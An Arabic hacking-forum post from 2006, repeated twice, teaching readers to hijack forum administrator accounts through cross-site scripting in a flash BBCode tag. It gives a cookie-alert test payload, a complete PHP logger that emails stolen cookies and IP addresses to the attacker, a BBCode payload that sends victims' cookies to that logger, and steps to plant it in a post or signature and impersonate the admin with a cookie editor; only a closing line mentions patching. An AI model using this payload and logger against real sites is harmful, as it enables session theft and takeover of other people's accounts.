مـــكـــس
07-06-2006, 03:40
بسم الله الرحمن الرحيم
طبعا في البداية الثغرة قديمة انشرحت كثير لكن حبيت انزلها في القسم لاني ما حصلتها فيه
عشان ما احد يسوي فيها ويقول قديمة
لكن كثير الممنتديات المصابة فيها
طبعا الثغرة بسيطة وما يحتاج و مكتشفها العندليب اذا ما كنت غلطان
المهم الثغرة من Xss واي واحد مبتدأ مثلي اكيد راح يقدر يطبقها عموما ما اطول عليكم بالكلام هذا
الأشياء المطلوبة الي لازم تكون عندك :
مساحة تقدر ترفع عليها ملف php طبعا عندك لايكوس
وبرنامج Cookie Editor :
هذا هو البرنامج انا رافعه على مساحه ( كليك يمين و حفظ الهذف بإسم )
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
روح ادخل اي منتدى تبغى تخترقه وشف اذا كان فيه صندوق سحري او ماسي
وسوي اضافة موضوع وانسخ الكود هذا والصقه في الموضوع
onmouseover='alert(document.cookie);'
دحين بس سوي مشاهدة الموضوع ومرر مأشر الماوس على الفلاش الي يظهر راح يظهر لك مسج بوكس بهذا الشكل
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
اذا ظهر زي ما في الصورة يعني الثغرة مو مرقعه .. المهم هذا الي ظهر هو معلومات الكوكي الخاصة فيك
لكن انت تبغي معلومات الكوكي الخاصة بالأدمن او اي يوزر في المنتدى ...
فلازم تربط الكود الي فوق بلوق عشان يسحب ملعومات الكوكي الخاصة باليوزر الي انت تبغاه
وهذا ملف لوق ....
<?php
// Thnx For Security 4 Arab - [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط] - [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
//----- S4a Logger v0.10 -----//
// Star
//Your Email --::--
$ToGet = "haag10@hotmail.com";
////////////////////////////////
$Ip = $REMOTE_ADDR;
$Sys = $[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
//////////////////////////////////////////////
if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();}
//
$Time = date("l dS of F Y h:i:s A");
$Hdr = 'From: Logger <logger@secourty>';
$Msg = '
Hi ,, Mr.Attacker :D
-------------------------------------------
- Thnx For S4a ,, Security For Arab Forum -
- s4a -
- s4a froum -
---------------------------------------------------------------------
- This Script Coded By Devil-00 [ Devil From Palestine ] -
- <devil-00@hotmail.co.uk><devil.00@gmail.com><devil0f0p@yahoo.com> -
---------------------------------------------------------------------
- IP ::- [ ' .$Ip.' ]
- System ::- [ '.$Sys.' ]
- The ****** ::- [ '.$id.' ]
- Time ::- [ '.$Time.' ]
---------------------------------------------------------------------
- root@devil00 ~ ./evilcat /etc/passwd -
- root@devil00 ~ ./s4acracker passwd --log <log.log> && -
---------------------------------------------------------------------
';
$send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr);
//
/* Refresh code ,, By Devil-00 [ 25/5/2005 ] << v0.10 */
if(isset($_GET["re"])){
$Refresh = $_GET["re"];
if($Refresh == ""){
mail ($ToGet,'S4a - [Error]','Refresh Is Set And Its Empty !!',$Hdr);
}else{
header("location:".$Refresh);
}
}
//
?>
انسخه والصقه في Notpad ( المفكرة )
كل الي عليك تغرة في الايميل $ToGet = "haag10@hotmail.com";
يعني ثغير الايميل حقي الي هو haag10@hotmail.com الي ايميلك
واعمل له حفظ بإسم واحفظة بإمتداد php يعني مثل MyLog.php
المهم بعدها تقوم ترفع اللوق على مساحتك المجانية (طبعا مثل ما قلت لازم تكون تدعم ملفات php) وخلي الرابط عندك
وهذا هو الكود بعد ما اتطور وربطنها بلمف اللوق (الاكواد واللوق من تصميم Devil-00)
[flash=[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]]onmouseover='location.href="[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]"+document.cookie'[/flash]
نجي الحين لشرح الكود :
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
هذا الفلاش الي تبغاه يظهر تعدله للفلاش الي انت تبيه
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
هذا رابط ملف اللوق الي انت رفعته تعدله لرابط اللوق تبعك
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
هذا الصفحة الي ينتقل اليها بعد ما يمرر الماوس اليوزر على الفلاش عشان ما يشك في شئ ويجي في صفحة اللوق
عدل على الكود بعدين انت وطريقتك ترسله للأدمن او تحطه بتوقيعك هذا شئ راجعلك
المهم بعد ما يمرر اليوزر مؤشر الماوس على الفلاش الي هو الثغرة يجيك على الايميل معلومات الكوكيز الخاصة فيه
زي ما في الصورة :
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
مثلا رقم اليوزر جايك في الصورة زي كدا bbuserid وهي زقم العضو الي انت تبغي تاخد معلومات الكوكي تبعه
وغالبا الادمن ما يكون رقم واحد والـ bb هذه تختلف من منتدى الي منتدى اخر
المهم دحين افتح برنامج كوكي اديتور وانا معطيك الرابط فوق
وسوي بحث بإسم الموقع الي تبغى تخترق منتداه
راح تطلع بعدها معلومات الكوكي الخاصة بك كلها مثل ما في الصورة
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
تغيرها الي معلومات الكوكي حقت اليوزر الي جاك على الايميل طبعا تغيرها كلها
وبعدين اقفل كل المتصفح الي فيه المنتدى يعني اي صفحه للمنتدى الي تبغى تخترقه اقفلها وتسوي حفظ لمعلومات الكوكي الجديدة
وترجع تفتح المنتدى مرة ثانية راح تحصل يقول لك اهلا بك يا اسم الادمن
وطبعا هذا تطبيقي على منتدى احد الاصدقاء طبعا اخذت اذنه :)
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
وطريقة الترقيع انشرحت هنا في القسم اكثر من مرة
او انك تخلي كلمة Cookie من الكلمات المحظورة
والافضل انك تلغى الفلاش من المنتدى كله لان ظهرت ثغرة جديدة يوضع السكريبت داخل الفلاش وهذه ماله ترقيع
لحتي يومه وتاريخه
تحياتي للجميع مــكــس
طبعا في البداية الثغرة قديمة انشرحت كثير لكن حبيت انزلها في القسم لاني ما حصلتها فيه
عشان ما احد يسوي فيها ويقول قديمة
لكن كثير الممنتديات المصابة فيها
طبعا الثغرة بسيطة وما يحتاج و مكتشفها العندليب اذا ما كنت غلطان
المهم الثغرة من Xss واي واحد مبتدأ مثلي اكيد راح يقدر يطبقها عموما ما اطول عليكم بالكلام هذا
الأشياء المطلوبة الي لازم تكون عندك :
مساحة تقدر ترفع عليها ملف php طبعا عندك لايكوس
وبرنامج Cookie Editor :
هذا هو البرنامج انا رافعه على مساحه ( كليك يمين و حفظ الهذف بإسم )
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
روح ادخل اي منتدى تبغى تخترقه وشف اذا كان فيه صندوق سحري او ماسي
وسوي اضافة موضوع وانسخ الكود هذا والصقه في الموضوع
onmouseover='alert(document.cookie);'
دحين بس سوي مشاهدة الموضوع ومرر مأشر الماوس على الفلاش الي يظهر راح يظهر لك مسج بوكس بهذا الشكل
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
اذا ظهر زي ما في الصورة يعني الثغرة مو مرقعه .. المهم هذا الي ظهر هو معلومات الكوكي الخاصة فيك
لكن انت تبغي معلومات الكوكي الخاصة بالأدمن او اي يوزر في المنتدى ...
فلازم تربط الكود الي فوق بلوق عشان يسحب ملعومات الكوكي الخاصة باليوزر الي انت تبغاه
وهذا ملف لوق ....
<?php
// Thnx For Security 4 Arab - [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط] - [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
//----- S4a Logger v0.10 -----//
// Star
//Your Email --::--
$ToGet = "haag10@hotmail.com";
////////////////////////////////
$Ip = $REMOTE_ADDR;
$Sys = $[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
//////////////////////////////////////////////
if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();}
//
$Time = date("l dS of F Y h:i:s A");
$Hdr = 'From: Logger <logger@secourty>';
$Msg = '
Hi ,, Mr.Attacker :D
-------------------------------------------
- Thnx For S4a ,, Security For Arab Forum -
- s4a -
- s4a froum -
---------------------------------------------------------------------
- This Script Coded By Devil-00 [ Devil From Palestine ] -
- <devil-00@hotmail.co.uk><devil.00@gmail.com><devil0f0p@yahoo.com> -
---------------------------------------------------------------------
- IP ::- [ ' .$Ip.' ]
- System ::- [ '.$Sys.' ]
- The ****** ::- [ '.$id.' ]
- Time ::- [ '.$Time.' ]
---------------------------------------------------------------------
- root@devil00 ~ ./evilcat /etc/passwd -
- root@devil00 ~ ./s4acracker passwd --log <log.log> && -
---------------------------------------------------------------------
';
$send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr);
//
/* Refresh code ,, By Devil-00 [ 25/5/2005 ] << v0.10 */
if(isset($_GET["re"])){
$Refresh = $_GET["re"];
if($Refresh == ""){
mail ($ToGet,'S4a - [Error]','Refresh Is Set And Its Empty !!',$Hdr);
}else{
header("location:".$Refresh);
}
}
//
?>
انسخه والصقه في Notpad ( المفكرة )
كل الي عليك تغرة في الايميل $ToGet = "haag10@hotmail.com";
يعني ثغير الايميل حقي الي هو haag10@hotmail.com الي ايميلك
واعمل له حفظ بإسم واحفظة بإمتداد php يعني مثل MyLog.php
المهم بعدها تقوم ترفع اللوق على مساحتك المجانية (طبعا مثل ما قلت لازم تكون تدعم ملفات php) وخلي الرابط عندك
وهذا هو الكود بعد ما اتطور وربطنها بلمف اللوق (الاكواد واللوق من تصميم Devil-00)
[flash=[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]]onmouseover='location.href="[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]"+document.cookie'[/flash]
نجي الحين لشرح الكود :
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
هذا الفلاش الي تبغاه يظهر تعدله للفلاش الي انت تبيه
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
هذا رابط ملف اللوق الي انت رفعته تعدله لرابط اللوق تبعك
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
هذا الصفحة الي ينتقل اليها بعد ما يمرر الماوس اليوزر على الفلاش عشان ما يشك في شئ ويجي في صفحة اللوق
عدل على الكود بعدين انت وطريقتك ترسله للأدمن او تحطه بتوقيعك هذا شئ راجعلك
المهم بعد ما يمرر اليوزر مؤشر الماوس على الفلاش الي هو الثغرة يجيك على الايميل معلومات الكوكيز الخاصة فيه
زي ما في الصورة :
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
مثلا رقم اليوزر جايك في الصورة زي كدا bbuserid وهي زقم العضو الي انت تبغي تاخد معلومات الكوكي تبعه
وغالبا الادمن ما يكون رقم واحد والـ bb هذه تختلف من منتدى الي منتدى اخر
المهم دحين افتح برنامج كوكي اديتور وانا معطيك الرابط فوق
وسوي بحث بإسم الموقع الي تبغى تخترق منتداه
راح تطلع بعدها معلومات الكوكي الخاصة بك كلها مثل ما في الصورة
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
تغيرها الي معلومات الكوكي حقت اليوزر الي جاك على الايميل طبعا تغيرها كلها
وبعدين اقفل كل المتصفح الي فيه المنتدى يعني اي صفحه للمنتدى الي تبغى تخترقه اقفلها وتسوي حفظ لمعلومات الكوكي الجديدة
وترجع تفتح المنتدى مرة ثانية راح تحصل يقول لك اهلا بك يا اسم الادمن
وطبعا هذا تطبيقي على منتدى احد الاصدقاء طبعا اخذت اذنه :)
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
وطريقة الترقيع انشرحت هنا في القسم اكثر من مرة
او انك تخلي كلمة Cookie من الكلمات المحظورة
والافضل انك تلغى الفلاش من المنتدى كله لان ظهرت ثغرة جديدة يوضع السكريبت داخل الفلاش وهذه ماله ترقيع
لحتي يومه وتاريخه
تحياتي للجميع مــكــس